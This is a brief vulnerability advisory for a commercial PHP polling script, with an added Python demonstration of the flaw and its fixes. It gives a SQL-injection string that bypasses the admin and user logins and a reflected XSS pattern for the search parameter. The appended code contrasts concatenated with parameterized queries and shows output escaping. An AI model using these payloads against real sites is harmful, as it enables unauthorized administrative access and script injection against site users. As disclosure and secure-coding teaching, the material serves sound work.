______________________________________________________________________________
XSS and Authentication bypass in Advanced Poll Script
Vendor: http://www.2daybiz.com/
___________________________
Author: Sid3^effects
_________________________________
Description:
Advanced Poll is a polling system with a powerful administration tool that supports both text file and MySQL database. Its features include multiple polls, unlimited options, IP-Logging, IP-Locking, cookie support, comment feature, vote expire feature, and random poll support.
Script cost: $140
---------------------------------------------------------------------------
* Authentication bypass:
The script has an authentication bypass in the admin login as well as in the user login.
Use ' or 1=1 or ''=' in both login and password.
User login demo: http://server/polls/login.php
Admin login demo: http://server/polls/admin/
---------------------------------------------------------------------------
* XSS (cross site scripting):
XSS is also found in the search field.
Attack Pattern: '"-->
DEMO: http://server/polls/index_search.php?category=[XSS]
---------------------------------------------------------------------------
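Added example, not part of the original advisory and not the vendor's code: it shows why the login string above passes a query built by string concatenation, and the two fixes that close both findings (parameterized queries for the logins, output encoding for the search value). Assumptions: the table and column names, the sample credentials, the function names, and SQLite standing in for the script's MySQL backend.

```python
import html
import sqlite3

PAYLOAD = "' or 1=1 or ''='"  # login string quoted in the advisory


def make_db():
    # Constructed sample table; names are assumptions, and the plaintext
    # password column is a simplification to keep the demo short.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-sample')")
    return db


def login_concatenated(db, user, pw):
    # Vulnerable pattern: input is pasted into the SQL text, so quotes in
    # the input change the structure of the WHERE clause.
    sql = ("SELECT username FROM users WHERE username = '" + user +
           "' AND password = '" + pw + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, user, pw):
    # Fix: placeholders keep input as data; quotes are never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (user, pw)).fetchone() is not None


def render_search_heading(category):
    # Fix for the reflected search value: encode it for the HTML context.
    return "<h2>Results for " + html.escape(category, quote=True) + "</h2>"


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", login_concatenated(db, PAYLOAD, PAYLOAD))
    print("parameterized:", login_parameterized(db, PAYLOAD, PAYLOAD))
    print(render_search_heading("'\"--><b>constructed</b>"))
```

With concatenation the WHERE clause contains an always-true `1=1` branch, so a row is returned without valid credentials; with placeholders the same input is compared as a literal string and matches nothing.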
ShoutZ :----------Indian Cyber warriors--Andhra hackers--
Greetz :-----------*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|<008---M4n0j--MayUr--